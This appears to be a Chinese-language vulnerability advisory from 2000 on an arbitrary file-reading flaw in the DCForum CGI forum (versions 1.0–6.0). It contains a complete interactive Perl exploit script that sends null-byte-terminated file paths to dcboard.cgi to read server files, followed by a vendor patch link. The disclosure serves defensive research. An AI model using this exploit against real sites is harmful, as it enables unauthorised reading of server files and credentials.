发布日期：2000-12-28
更新日期：2000-12-28

受影响系统：

DCForum 1.0 - 6.0
  - UNIX, Linux, Windows NT/2000

描述：

---

Dcforum是http://www.dcscripts.com提供的一个论坛CGI程序。
它的/dcforum/dcboard.cgi缺乏对用户输入变量的正确检查，导致攻击者可
以用web server运行身份（通常是nobody）查看任意文件。

<*来源：admin@cgisecurity.com
        相关链接：http://www.cgisecurity.com/advisory/2.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify

$site = $ARGV[0];
$cgi  = $ARGV[1];
$inet = inet_aton($site);

die "\n\t---   Usage:$0 <site> <cgi location,duh>  ---" if(@ARGV == '0' ||
@ARGV < 2);

print "\n\t---   DCForum 1.0 - 6.0 Exploit ---";
print "\n\t---   By the cool fellas at *   ---\n\n";

while(true) { # yea i think I stole this from the pollex.pl , uh thanks.

print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);

print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action
ne "r" || $action ne "q");

if ($action eq "r") {
print "\nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
print "now exiting program\n";
exit;
  }
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]


建议：

---

厂商补丁：

dcscripts已经提供了补丁下载：

http://www.dcscripts.com/dcforum/dcfNews/124.html


浏览次数：5690
严重程度：0（网友投票）